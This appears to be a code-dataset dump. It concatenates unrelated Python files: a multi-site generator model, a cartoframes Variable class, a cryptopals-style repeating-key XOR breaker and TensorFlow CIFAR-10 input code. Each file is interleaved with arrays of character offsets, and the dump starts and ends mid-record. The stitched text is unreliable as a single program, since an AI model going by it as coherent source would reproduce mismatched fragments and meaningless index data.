1965
],
[
2012,
2015
],
[
2070,
2073
],
[
2181,
2184
],
[
2133,
2136
],
[
2800,
2803
],
[
3378,
3381
],
[
3461,
3464
],
[
3556,
3559
],
[
3844,
3847
]
],
[
[
208,
214
],
[
364,
370
]
],
[
[
221,
233
]
],
[
[
750,
767
]
],
[
[
1592,
1611
],
[
2258,
2277
]
],
[
[
2106,
2115
]
],
[
[
2286,
2302
]
],
[
[
3023,
3032
]
]
] |
#
#
# Copyright (C) University of Melbourne 2013
#
#
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
#
#
"""Module subclassing TxMultiGeneratorBase that provides an implementation for
multi-site generators.
"""
from tools import mureilexception, mureilbuilder
import copy
import numpy
from generator import txmultigeneratorbase
import logging
logger = logging.getLogger(__name__)
class TxMultiGeneratorMultiSite(txmultigeneratorbase.TxMultiGeneratorBase):
"""Module subclassing TxMultiGeneratorBase that provides an implementation of
state_handle and related handling functions for multi-site generators.
The 'capacity' term in state_handle is implemented as a dict with one item per site.
    Each site item is a list of tuples containing (capacity, build_period, decommissioning_period),
describing the set of installed capacity.
"""
def __init__(self):
"""Initialise as for the base class, and also initialise the params_to_site map.
"""
txmultigeneratorbase.TxMultiGeneratorBase.__init__(self)
# params_to_site maps the index in the params list to the site indices.
self.params_to_site = []
def get_config_spec(self):
"""Return a list of tuples of format (name, conversion function, default),
e.g. ('capex', float, 2.0). Put None if no conversion required, or if no
default value, e.g. ('name', None, None)
Configuration:
time_period_yrs: float - the length of the time period in years
time_scale_up_mult: float - the value to multiply non-discounted items,
such as carbon emissions, by to account for a shorter dataset than the
calculation period length.
variable_cost_mult: as for time_scale_up_mult, but may include a factor for
cost discounting.
size: float, optional - relates param to new capacity
carbon_price_m: float - carbon price in $M/tonne
startup_data_name: string, optional - the name of the data array that contains
data on startup capacities.
startup_data_string: string, optional - a python format data array suitable for
input into set_startup_state, all on a single line.
params_to_site_data_name: string, optional - the name of the data array that
contains a list of how the input params list maps to site indices.
params_to_site_data_string: list of integers, optional - the site indices,
listed separated by spaces, defining the site index corresponding to
each optimisation param, in order.
vom: float, default 0 - variable operating and maintenance cost, in $/MWh, same for all sites
capital_cost: float, default 0 - cost in $M per MW for new capacity.
install_cost: float, default 0 - cost in $M per site, when site has an
installation from this generator for the first time.
decommissioning_cost: float, optional (default 0) - cost in $M per MW for
decommissioning.
lifetime_yrs: float, default 20 - the time in years that new capacity lasts
"""
return txmultigeneratorbase.TxMultiGeneratorBase.get_config_spec(self) + [
('variable_cost_mult', float, 1.0),
('time_scale_up_mult', float, 1.0),
('carbon_price_m', float, 0.0),
('startup_data_name', None, ''),
('startup_data_string', mureilbuilder.python_eval, 'None'),
('params_to_site_data_name', None, ''),
('params_to_site_data_string', mureilbuilder.make_int_list, ''),
('decommissioning_cost', float, 0),
('vom', float, 0),
('capital_cost', float, 0),
('install_cost', float, 0),
('time_period_yrs', float, None),
('lifetime_yrs', float, 20),
('size', float, 1.0),
('start_min_param', int, 1e20),
('start_max_param', int, 1e20),
('timestep_hrs', float, None)
]
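    # Illustrative (hedged) excerpt of a configuration produced from the spec above:
    #   {'time_period_yrs': 5.0, 'lifetime_yrs': 20.0, 'capital_cost': 1.2,
    #    'size': 100.0, 'carbon_price_m': 0.0, 'variable_cost_mult': 1.0, ...}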
def complete_configuration_pre_expand(self):
"""Complete the configuration prior to expanding the
period configs.
This implementation checks that the lifetime_yrs is a multiple
of time_period_yrs, and sets the startup state and params_to_site from the
configuration strings.
"""
time_period_yrs = self.config['time_period_yrs']
lifetime_yrs = self.config['lifetime_yrs']
error = None
if isinstance(lifetime_yrs, dict):
for value in lifetime_yrs.itervalues():
div = value / time_period_yrs
if not (float(int(div)) == div):
error = value
else:
div = lifetime_yrs / time_period_yrs
if not (float(int(div)) == div):
error = lifetime_yrs
if error is not None:
msg = ('In section ' + self.config['section'] + ', lifetime_yrs = ' +
str(error) + ' which is required to be a multiple of time_period_yrs of ' +
str(time_period_yrs))
raise mureilexception.ConfigException(msg, {})
# Set the startup state and the params to site from the configuration strings.
if self.config['startup_data_string'] is not None:
self.set_startup_state(self.config['startup_data_string'])
if len(self.config['params_to_site_data_string']) > 0:
self.params_to_site = self.config['params_to_site_data_string']
def get_data_types(self):
"""Return a list of keys for each type of
data required, for example ts_wind, ts_demand.
Outputs:
data_type: list of strings - each a key name
describing the data required for this generator.
"""
data_types = []
if len(self.config['startup_data_name']) > 0:
data_types.append(self.config['startup_data_name'])
if len(self.config['params_to_site_data_name']) > 0:
data_types.append(self.config['params_to_site_data_name'])
return data_types
def set_data(self, data):
"""Set the data dict with the data series required
for the generator.
This implementation looks for the data types:
self.config['startup_data_name']: Interpets this into
the startup state, using the set_startup_state function.
self.config['params_to_site_data_name']: Sets self.params_to_site
to this.
Inputs:
data: dict - with keys matching those requested by
get_data_types.
"""
startup_data_name = self.config['startup_data_name']
if (len(startup_data_name) > 0) and (startup_data_name in data):
self.set_startup_state(data[startup_data_name])
params_to_site_name = self.config['params_to_site_data_name']
if (len(params_to_site_name) > 0) and (params_to_site_name in data):
self.params_to_site = data[params_to_site_name]
def set_startup_state(self, startup_data):
"""Set the startup state from the data provided. Sets
self.startup_state from this.
Inputs:
startup_data: An array of generators * 4:
[[site_index, capacity, build_date, decommissioning_period],
...]
"""
# Check if the startup data is empty. If so, just return.
if len(startup_data) == 0:
return
# Find out which build periods are covered.
startup_data = numpy.array(startup_data)
if not (len(startup_data.shape) == 2):
raise mureilexception.ConfigException('startup data array for module ' +
self.config['section'] + ' is not rectangular.', {})
if not (startup_data.shape[1] == 4):
raise mureilexception.ConfigException('startup data array for module ' +
self.config['section'] + ' shape ' + str(startup_data.shape) +
' but (n, 4) is required.', {})
self.extra_periods = map(int,
(list(set(startup_data[:,2].tolist() + self.extra_periods))))
self.extra_periods.sort()
# And insert each existing generator into the starting state.
cap_list = self.startup_state['capacity']
hist_list = self.startup_state['history']
for i in range(startup_data.shape[0]):
site_index = int(startup_data[i, 0])
new_cap = startup_data[i, 1]
period = int(startup_data[i, 2])
decomm_date = int(startup_data[i, 3])
new_entry = (new_cap, period, decomm_date)
if decomm_date < self.run_periods[0]:
                logger.warning('Model in section ' + self.config['section'] +
                    ' adds startup capacity decommissioned at end of ' + str(decomm_date) +
                    ' but the first run period is ' + str(self.run_periods[0]) +
                    ' so it has been removed from the startup state.')
if site_index not in hist_list:
hist_list[site_index] = []
hist_list[site_index].append(new_entry)
else:
new_entry = (new_cap, period, decomm_date)
if site_index not in cap_list:
cap_list[site_index] = []
cap_list[site_index].append(new_entry)
def get_param_count(self):
"""Return the number of parameters that this generator,
as configured, requires to be optimised, per time period.
Outputs:
param_count: non-negative integer - the number of
parameters required per time period.
"""
return len(self.params_to_site)
def get_param_starts(self):
"""Return two nested lists - one for min, one max, for starting values for the
params. Must be either [[]] or [len(run_periods),param_count].
Outputs:
min_start_list: list of param integers, or [[]]
max_start_list: list of param integers, or [[]]
"""
param_count = self.get_param_count()
period_count = len(self.run_periods)
if param_count > 0:
if (self.config['start_min_param'] == 1e20):
start_mins = [[]]
else:
start_mins = (numpy.ones((period_count, param_count)) * self.config['start_min_param']).tolist()
if (self.config['start_max_param'] == 1e20):
start_maxs = [[]]
else:
start_maxs = (numpy.ones((period_count, param_count)) * self.config['start_max_param']).tolist()
else:
start_mins = [[]]
start_maxs = [[]]
return start_mins, start_maxs
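# Sketch (added for illustration, with hypothetical config values): with 2 run
# periods, 3 params per period, 'start_min_param' = 0 and 'start_max_param' = 5,
# the method returns
#   start_mins = [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]
#   start_maxs = [[5.0, 5.0, 5.0], [5.0, 5.0, 5.0]]
# whereas a sentinel value of 1e20 for either config entry yields [[]] for that list.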
def update_state_new_period_list(self, state_handle, period, new_capacity):
"""Implements update_state_new_period_list as defined in txmultigeneratorbase,
for the state_handle format for this multi-site implementation.
"""
state_handle['curr_period'] = period
cap_list = state_handle['capacity']
for site_index, new_cap, decomm_date in new_capacity:
site_index = int(site_index)
new_entry = (new_cap, period, int(decomm_date))
if site_index not in cap_list:
cap_list[site_index] = []
cap_list[site_index].append(new_entry)
return None
def update_state_new_period_params(self, state_handle, period, new_params):
"""Implements update_state_new_period_params as defined in txmultigeneratorbase,
for the state_handle format for this multi-site implementation.
Filters any negative new_params values to 0.
"""
state_handle['curr_period'] = period
curr_conf = self.period_configs[period]
decomm_date = int(curr_conf['lifetime_yrs'] - curr_conf['time_period_yrs'] + period)
cap_list = state_handle['capacity']
new_cap = numpy.array(new_params).clip(0) * curr_conf['size']
for i in (numpy.nonzero(new_cap)[0]):
site_index = self.params_to_site[i]
new_entry = (new_cap[i], period, decomm_date)
if site_index not in cap_list:
cap_list[site_index] = []
cap_list[site_index].append(new_entry)
return None
def calculate_update_decommission(self, state_handle):
"""Implements update_decommission as defined in txmultigeneratorbase,
for the state_handle format for this multi-site implementation.
"""
period = state_handle['curr_period']
cap_list = state_handle['capacity']
hist_list = state_handle['history']
total_cost = 0.0
sites = []
cost = []
decommissioned = []
fully_decommissioned = []
decomm_cost = self.period_configs[period]['decommissioning_cost']
for site, site_caps in cap_list.iteritems():
decomm = [tup for tup in site_caps if (tup[2] == period)]
if len(decomm) > 0:
sites.append(site)
decom_cap = sum([tup[0] for tup in decomm])
decommissioned.append(decom_cap)
this_cost = decom_cap * decomm_cost
cost.append(this_cost)
total_cost += this_cost
# add the decommissioned capacity to the 'history' list
if site not in hist_list:
hist_list[site] = []
hist_list[site] += decomm
# and rebuild the list of what's left
# note that the expression in here is the complement of that to compute
# decomm above.
new_list = [tup for tup in site_caps if not (tup[2] == period)]
# if all capacity is gone from this site
if len(new_list) == 0:
fully_decommissioned.append(site)
else:
cap_list[site] = new_list
for site in fully_decommissioned:
del cap_list[site]
return total_cost, zip(sites, decommissioned, cost)
def calculate_new_capacity_cost(self, state_handle):
"""Implements calculate_new_capacity_cost as defined in TxMultiGeneratorBase,
for the state_handle format for this multi-site implementation. Calculates
the cost as a simple multiple of the new capacity size.
"""
period = state_handle['curr_period']
cap_list = state_handle['capacity']
hist_list = state_handle['history']
total_cost = 0.0
sites = []
cost = []
new_capacity = []
for site, value in cap_list.iteritems():
try:
hist = hist_list[site]
except KeyError:
hist = []
this_cost, new_cap = self.calculate_capital_cost_site(
(value, hist), period, site)
if new_cap > 0:
sites.append(site)
new_capacity.append(new_cap)
cost.append(this_cost)
total_cost += this_cost
return total_cost, zip(sites, new_capacity, cost)
def calculate_capital_cost_site(self, site_data, period, site):
""""Calculate the incremental capital cost incurred in this
period by the new capacity, for this site.
This is a useful function for generators to override to implement
cost functions that depend on the existing installed capacity.
This function charges a per-MW cost plus an install figure if all
the current capacity is new, and the site has not been used before
for this type of generator.
Inputs:
site_data: a pair of lists - (current_capacity, history), each
a list of tuples of (capacity, build, decom) from the
state_handle.
period: the current period, an integer
site: the site index
Outputs:
cost: the cost in $M of this new capacity
new_capacity: the total new capacity installed at this site
"""
new_cap_list = [tup[0] for tup in site_data[0] if (tup[1] == period)]
new_cap = sum(new_cap_list)
capacity_cost = self.period_configs[period]['capital_cost']
this_cost = new_cap * capacity_cost
install_cost = self.period_configs[period]['install_cost']
if install_cost > 0:
# check if all the current capacity is new
if len(new_cap_list) == len(site_data[0]):
# and check if the site has been used before, ever
if len(site_data[1]) == 0:
# the site is new, so charge the 'install' as well
this_cost += install_cost
return this_cost, new_cap
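# Worked example (illustrative, assuming hypothetical config values): with
# capital_cost = 1.5 $M/MW, install_cost = 10 $M, and 200 MW built this period
# at a site with no older capacity and an empty history, the method returns
#   this_cost = 200 * 1.5 + 10 = 310.0, new_cap = 200
# If the site already holds older capacity, or appears in the history list,
# only the per-MW component 200 * 1.5 = 300.0 is charged.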
def get_capacity(self, state_handle):
"""Implement the get_capacity function as defined in TxMultiGeneratorBase, for this
multi-site implementation.
"""
index_list = self.get_site_indices(state_handle)
cap_list = state_handle['capacity']
capacity = []
for site in index_list:
capacity.append(sum([tup[0] for tup in cap_list[site]]))
return capacity
def get_site_indices(self, state_handle):
"""Implement the get_site_indices function as defined in TxMultiGeneratorBase, for this
multi-site implementation.
"""
site_indices = state_handle['capacity'].keys()
site_indices.sort()
return site_indices
def calculate_time_period_simple(self, state_handle, period, new_params,
supply_request, full_results=False):
"""Implement calculate_time_period_simple as defined in TxMultiGeneratorBase for
the multi-site generator model.
"""
curr_config = self.period_configs[period]
# Update the state and get the calculations for each site
self.update_state_new_period_params(state_handle, period, new_params)
site_indices = self.get_site_indices(state_handle)
capital_cost, new_capacity = self.calculate_new_capacity_cost(state_handle)
supply_list, variable_cost_list, carbon_emissions_list, other_list = (
self.calculate_outputs_and_costs(state_handle, supply_request))
if full_results:
capacity = self.get_capacity(state_handle)
# Compute the total supply
supply = numpy.sum(supply_list, axis=0)
# Compute the total variable costs, including carbon cost, for the timeseries, scaled up
cost = ((numpy.sum(variable_cost_list, axis=0) +
(numpy.sum(carbon_emissions_list, axis=0) * curr_config['carbon_price_m'])) * (
curr_config['variable_cost_mult']))
# Do the decommissioning
decomm_cost, decommissioned = self.calculate_update_decommission(state_handle)
# Add the capital and decommissioning costs
cost += decomm_cost
cost += capital_cost
if not full_results:
return site_indices, cost, supply
if full_results:
results = {}
results['site_indices'] = site_indices
results['cost'] = cost
results['aggregate_supply'] = supply
results['capacity'] = capacity
results['decommissioned'] = decommissioned
results['new_capacity'] = new_capacity
results['supply'] = supply_list
results['variable_cost_period'] = variable_cost_list * curr_config['variable_cost_mult']
results['carbon_emissions_period'] = (carbon_emissions_list *
curr_config['time_scale_up_mult'])
results['total_supply_period'] = (curr_config['time_scale_up_mult'] * numpy.sum(supply) *
curr_config['timestep_hrs'])
results['other'] = other_list
results['desc_string'] = self.get_simple_desc_string(results, state_handle)
return site_indices, cost, supply, results
def calculate_time_period_full(self, state_handle, period, new_params, supply_request,
max_supply=[], price=[], make_string=False, do_decommissioning=True):
"""Implement calculate_time_period_full as defined in TxMultiGeneratorBase for
the multi-site generator model.
"""
results = {}
self.update_state_new_period_params(state_handle, period, new_params)
results['site_indices'] = self.get_site_indices(state_handle)
results['capacity'] = self.get_capacity(state_handle)
dummy, results['new_capacity'] = self.calculate_new_capacity_cost(state_handle)
results['supply'], results['variable_cost_ts'], results['carbon_emissions_ts'], results['other'] = (
self.calculate_outputs_and_costs(state_handle, supply_request, max_supply, price))
if do_decommissioning:
dummy, results['decommissioned'] = (
self.calculate_update_decommission(state_handle))
else:
results['decommissioned'] = []
if make_string:
results['desc_string'] = self.get_full_desc_string(results, state_handle)
return results
def recalculate_time_period_full(self, state_handle, results, supply_request, max_supply=[], price=[], make_string=False):
"""Implement recalculate_time_period_full as defined in TxMultiGeneratorBase for
the multi-site generator model.
"""
results['supply'], results['variable_cost_ts'], results['carbon_emissions_ts'], results['other'] = (
self.calculate_outputs_and_costs(state_handle, supply_request, max_supply, price))
if make_string:
results['desc_string'] = self.get_full_desc_string(results, state_handle)
return results
def calculate_costs_from_schedule_and_finalise(self, state_handle, schedule, make_string=False):
"""Calculate the costs, given the schedule from the dispatcher.
Finalise the decommissioning for that period.
This assumes that update_state_new_period_params has been called previously,
and the offer quantities have been determined for the active sites.
Inputs:
state_handle:
as for calculate_time_period_full in txmultigeneratorbase.py
schedule: a set of timeseries for each active site, as previously
listed in the call to get_offers_*
Outputs:
as for calculate_time_period_full in txmultigeneratorbase.py
"""
results = {}
site_indices = self.get_site_indices(state_handle)
results['site_indices'] = site_indices
results['capacity'] = self.get_capacity(state_handle)
results['new_capacity_total_cost'], results['new_capacity'] = self.calculate_new_capacity_cost(state_handle)
results['supply'] = schedule
results['variable_cost_ts'], results['carbon_emissions_ts'], results['other'] = (
self.calculate_variable_costs(state_handle, site_indices, schedule))
results['decomm_total_cost'], results['decommissioned'] = (
self.calculate_update_decommission(state_handle))
if make_string:
results['desc_string'] = self.get_full_desc_string(results, state_handle)
return results
| [
[
[
1256,
1271
],
[
6423,
6438
],
[
9145,
9160
],
[
9365,
9380
]
],
[
[
1273,
1286
],
[
4673,
4686
],
[
4806,
4819
]
],
[
[
1295,
1299
]
],
[
[
1308,
1313
],
[
9052,
9057
],
[
11959,
11964
],
[
12188,
12193
],
[
13740,
13745
],
[
13813,
13818
],
[
20633,
20638
],
[
20790,
20795
],
[
20845,
20850
],
[
22008,
22013
]
],
[
[
1337,
1357
],
[
1449,
1469
],
[
2061,
2081
],
[
4379,
4399
]
],
[
[
1368,
1375
],
[
1386,
1393
]
],
[
[
1377,
1383
],
[
10254,
10260
]
],
[
[
1423,
1448
]
]
] |
import pandas as pd
from .entity import CatalogEntity
from .repository.dataset_repo import get_dataset_repo
from .repository.variable_repo import get_variable_repo
from .repository.constants import VARIABLE_FILTER
from .summary import variable_describe, head, tail, counts, quantiles, top_values, histogram
_DESCRIPTION_LENGTH_LIMIT = 50
class Variable(CatalogEntity):
"""This class represents a :py:class:`Variable <cartoframes.data.observatory.Variable>`
of datasets in the :py:class:`Catalog <cartoframes.data.observatory.Catalog>`.
Variables contain column names, description, data type, aggregation method, and some other metadata that is
useful to understand the underlying data inside a :obj:`Dataset`
Examples:
List the variables of a :py:class:`Dataset <cartoframes.data.observatory.Dataset>`
in combination with nested filters (categories, countries, etc.)
>>> dataset = Dataset.get('mbi_retail_turn_705247a')
>>> dataset.variables
[<Variable.get('RT_CI_95050c10')> #'Retail Turnover: index (country eq.100)', ...]
"""
_entity_repo = get_variable_repo()
@property
def datasets(self):
"""Get the list of datasets related to this variable.
Returns:
:py:class:`CatalogList <cartoframes.data.observatory.entity.CatalogList>` List of Dataset instances.
Raises:
CatalogError: if there's a problem when connecting to the catalog or no datasets are found.
"""
return get_dataset_repo().get_all({VARIABLE_FILTER: self.id})
@property
def name(self):
"""Name of this variable."""
return self.data['name']
@property
def description(self):
"""Description of this variable."""
return self.data['description']
@property
def column_name(self):
"""Column name of the actual table related to the variable in the :obj:`Dataset`."""
return self.data['column_name']
@property
def db_type(self):
"""Type in the database.
Returns:
str
Examples: INTEGER, STRING, FLOAT, GEOGRAPHY, JSON, BOOL, etc.
"""
return self.data['db_type']
@property
def dataset(self):
"""ID of the :obj:`Dataset` to which this variable belongs."""
return self.data['dataset_id']
@property
def agg_method(self):
"""Text representing a description of the aggregation method used to compute the values in this `Variable`"""
return self.data['agg_method']
@property
def variable_group(self):
"""If any, ID of the variable group to which this variable belongs."""
return self.data['variable_group_id']
@property
def summary(self):
"""JSON object with extra metadata that summarizes different properties of this variable."""
return self.data['summary_json']
@property
def project_name(self):
project, _, _, _ = self.id.split('.')
return project
@property
def schema_name(self):
_, schema, _, _ = self.id.split('.')
return schema
@property
def dataset_name(self):
_, _, dataset, _ = self.id.split('.')
return dataset
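# Note (added for clarity): the three properties above assume a four-part id of
# the form 'project.schema.dataset.variable'; for a hypothetical id such as
# 'carto-do.mbi.retail_turn.RT_CI_95050c10' they would yield
# project_name='carto-do', schema_name='mbi' and dataset_name='retail_turn'.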
def describe(self, autoformat=True):
"""Shows a summary of the actual stats of the variable (column) of the dataset.
Some of the stats provided per variable are: avg, max, min, sum, range,
stdev, q1, q3, median and interquartile_range
Args:
autoformat (boolean): set automatic format for values. Default is True.
Example:
.. code::
# avg average value
# max max value
# min min value
# sum sum of all values
# range
# stdev standard deviation
# q1 first quantile
# q3 third quantile
# median median value
# interquartile_range
"""
FLOAT_FORMAT = 'display.float_format'
if autoformat:
pd.set_option(FLOAT_FORMAT, lambda x: '%.3f' % x)
data = self.data['summary_json']
return variable_describe(data)
def head(self):
"""Returns a sample of the 10 first values of the variable data.
For the cases of datasets with a content fewer than 10 rows
(i.e. zip codes of small countries), this method won't return anything
"""
data = self.data['summary_json']
return head(self.__class__, data)
def tail(self):
"""Returns a sample of the 10 last values of the variable data.
For the cases of datasets with a content fewer than 10 rows
(i.e. zip codes of small countries), this method won't return anything
"""
data = self.data['summary_json']
return tail(self.__class__, data)
def counts(self):
"""Returns a summary of different counts over the actual variable values.
Example:
.. code::
# all total number of values
# null total number of null values
# zero number of zero-valued entries
# extreme number of values more than 3 stdev outside the interquartile range
# distinct number of distinct (unique) entries
# outliers number of outliers (outside 1.5 stdev of the interquartile range)
# zero_percent percent of values that are zero
# distinct_percent percent of values that are distinct
"""
data = self.data['summary_json']
return counts(data)
def quantiles(self):
"""Returns the quantiles of the variable data."""
data = self.data['summary_json']
return quantiles(data)
def top_values(self):
"""Returns information about the top values of the variable data."""
data = self.data['summary_json']
return top_values(data)
def histogram(self):
"""Plots an histogram with the variable data."""
data = self.data['summary_json']
return histogram(data)
def __repr__(self):
descr = self.description
if descr and len(descr) > _DESCRIPTION_LENGTH_LIMIT:
descr = descr[0:_DESCRIPTION_LENGTH_LIMIT] + '...'
return "<{classname}.get('{entity_id}')> #'{descr}'" \
.format(classname=self.__class__.__name__, entity_id=self._get_print_id(), descr=descr)
| [
[
[
7,
19
],
[
4241,
4243
]
],
[
[
41,
54
],
[
358,
371
]
],
[
[
92,
108
],
[
1522,
1538
]
],
[
[
147,
164
],
[
1121,
1138
]
],
[
[
199,
214
],
[
1550,
1565
]
],
[
[
236,
253
],
[
4348,
4365
]
],
[
[
255,
259
],
[
4683,
4687
]
],
[
[
261,
265
],
[
5020,
5024
]
],
[
[
267,
273
],
[
5853,
5859
]
],
[
[
275,
284
],
[
6006,
6015
]
],
[
[
286,
296
],
[
6182,
6192
]
],
[
[
298,
307
],
[
6338,
6347
]
],
[
[
310,
335
],
[
6447,
6472
],
[
6502,
6527
]
],
[
[
349,
357
]
]
] |
from libcrypto import hamming_distance
from libcrypto import split_blocks
from libcrypto import xor
from libcrypto import freq_score
from base64 import b64decode
from operator import itemgetter
def main():
file64 = ""
for line in open("../assets/inputS1C6.txt","r"):
file64 += line.rstrip()
file = bytearray(b64decode(file64))
distances = []
for keysize in range(2,40):
dist = 0
sample_size = 10
for ctr in range(0, sample_size):
b1 = bytearray(file[(keysize*ctr):(keysize*(ctr+1))])
b2 = bytearray(file[(keysize*(ctr+1)):(keysize*(ctr+2))])
dist += hamming_distance(b1, b2) / float(keysize)
dist /= sample_size
distances.append([keysize, dist])
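# The loop above scores each candidate keysize by the average Hamming distance
# between consecutive keysize-long blocks, normalised by the keysize; for the
# true repeating-key length the compared blocks were XORed with the same key
# bytes, so the normalised distance tends to be the smallest.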
distances = sorted(distances,key=itemgetter(1))[:1]
print("Possible Solutions...\n")
for key in distances:
passphrase = ""
key = key[0]
blocks = split_blocks(key,file)
transposed_blocks = []
for idx in range(0,key):
tblock = bytearray()
for block in blocks:
try:
tblock.append(block[idx])
except IndexError:
pass
transposed_blocks.append(tblock)
for block in transposed_blocks:
bytekeys = []
for i in range(1,int("ff",16)):
xor_bytes = xor(bytearray(bytes({i})),block)
try:
xor_string = xor_bytes.decode("ascii")
bytekeys.append([i,xor_string,freq_score(xor_string)])
except UnicodeDecodeError:
continue
bytekeys.sort(key=lambda x: x[2], reverse=True)
bkey = bytekeys[:1][0]
passphrase += chr(bkey[0])
print("Key:{0}\n".format(passphrase))
print(xor(bytearray(passphrase.encode()),bytearray(file)).decode())
if __name__ == "__main__":
main() | [
[
[
22,
38
],
[
645,
661
]
],
[
[
61,
73
],
[
941,
953
]
],
[
[
96,
99
],
[
1407,
1410
],
[
1861,
1864
]
],
[
[
122,
132
],
[
1571,
1581
]
],
[
[
153,
162
],
[
333,
342
]
],
[
[
184,
194
],
[
795,
805
]
],
[
[
201,
205
],
[
1955,
1959
]
]
] |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Routine for decoding the CIFAR-10 binary file format."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# Process images of this size. Note that this differs from the original CIFAR
# image size of 32 x 32. If one alters this number, then the entire model
# architecture will change and any model would need to be retrained.
IMAGE_SIZE = 24
# Global constants describing the CIFAR-10 data set.
NUM_CLASSES = 10
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 50000
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 10000
def read_cifar10(filename_queue):
"""Reads and parses examples from CIFAR10 data files.
Recommendation: if you want N-way read parallelism, call this function
N times. This will give you N independent Readers reading different
files & positions within those files, which will give better mixing of
examples.
Args:
filename_queue: A queue of strings with the filenames to read from.
Returns:
An object representing a single example, with the following fields:
height: number of rows in the result (32)
width: number of columns in the result (32)
depth: number of color channels in the result (3)
key: a scalar string Tensor describing the filename & record number
for this example.
label: an int32 Tensor with the label in the range 0..9.
uint8image: a [height, width, depth] uint8 Tensor with the image data
"""
class CIFAR10Record(object):
pass
result = CIFAR10Record()
# Dimensions of the images in the CIFAR-10 dataset.
# See http://www.cs.toronto.edu/~kriz/cifar.html for a description of the
# input format.
label_bytes = 1 # 2 for CIFAR-100
result.height = 32
result.width = 32
result.depth = 3
image_bytes = result.height * result.width * result.depth
# Every record consists of a label followed by the image, with a
# fixed number of bytes for each.
record_bytes = label_bytes + image_bytes
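# For the standard CIFAR-10 binary format this works out to
# 1 + 32 * 32 * 3 = 3073 bytes per record.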
# Read a record, getting filenames from the filename_queue. No
# header or footer in the CIFAR-10 format, so we leave header_bytes
# and footer_bytes at their default of 0.
reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)
result.key, value = reader.read(filename_queue)
# Convert from a string to a vector of uint8 that is record_bytes long.
record_bytes = tf.decode_raw(value, tf.uint8)
# The first bytes represent the label, which we convert from uint8->int32.
result.label = tf.cast(
tf.strided_slice(record_bytes, [0], [label_bytes], [1]), tf.int32)
# The remaining bytes after the label represent the image, which we reshape
# from [depth * height * width] to [depth, height, width].
depth_major = tf.reshape(
tf.strided_slice(record_bytes, [label_bytes],
[label_bytes + image_bytes], [1]),
[result.depth, result.height, result.width])
# Convert from [depth, height, width] to [height, width, depth].
result.uint8image = tf.transpose(depth_major, [1, 2, 0])
return result
def _generate_image_and_label_batch(image, label, min_queue_examples,
batch_size, shuffle):
"""Construct a queued batch of images and labels.
Args:
image: 3-D Tensor of [height, width, 3] of type.float32.
label: 1-D Tensor of type.int32
min_queue_examples: int32, minimum number of samples to retain
in the queue that provides of batches of examples.
batch_size: Number of images per batch.
shuffle: boolean indicating whether to use a shuffling queue.
Returns:
images: Images. 4D tensor of [batch_size, height, width, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
"""
# Create a queue that shuffles the examples, and then
# read 'batch_size' images + labels from the example queue.
num_preprocess_threads = 16
if shuffle:
images, label_batch = tf.train.shuffle_batch(
[image, label],
batch_size=batch_size,
num_threads=num_preprocess_threads,
capacity=min_queue_examples + 3 * batch_size,
min_after_dequeue=min_queue_examples)
else:
images, label_batch = tf.train.batch(
[image, label],
batch_size=batch_size,
num_threads=num_preprocess_threads,
capacity=min_queue_examples + 3 * batch_size)
# Display the training images in the visualizer.
tf.summary.image('images', images)
return images, tf.reshape(label_batch, [batch_size])
def distorted_inputs(data_dir, batch_size):
"""Construct distorted input for CIFAR training using the Reader ops.
Args:
data_dir: Path to the CIFAR-10 data directory.
batch_size: Number of images per batch.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
"""
filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i)
for i in xrange(1, 6)]
for f in filenames:
if not tf.gfile.Exists(f):
raise ValueError('Failed to find file: ' + f)
# Create a queue that produces the filenames to read.
filename_queue = tf.train.string_input_producer(filenames)
# Read examples from files in the filename queue.
read_input = read_cifar10(filename_queue)
reshaped_image = tf.cast(read_input.uint8image, tf.float32)
height = IMAGE_SIZE
width = IMAGE_SIZE
# Image processing for training the network. Note the many random
# distortions applied to the image.
# Randomly crop a [height, width] section of the image.
distorted_image = tf.random_crop(reshaped_image, [height, width, 3])
# Randomly flip the image horizontally.
distorted_image = tf.image.random_flip_left_right(distorted_image)
# Because these operations are not commutative, consider randomizing
# the order of their operation.
distorted_image = tf.image.random_brightness(distorted_image,
max_delta=63)
distorted_image = tf.image.random_contrast(distorted_image,
lower=0.2, upper=1.8)
# Subtract off the mean and divide by the variance of the pixels.
float_image = tf.image.per_image_standardization(distorted_image)
# Set the shapes of tensors.
float_image.set_shape([height, width, 3])
read_input.label.set_shape([1])
# Ensure that the random shuffling has good mixing properties.
min_fraction_of_examples_in_queue = 0.4
min_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN *
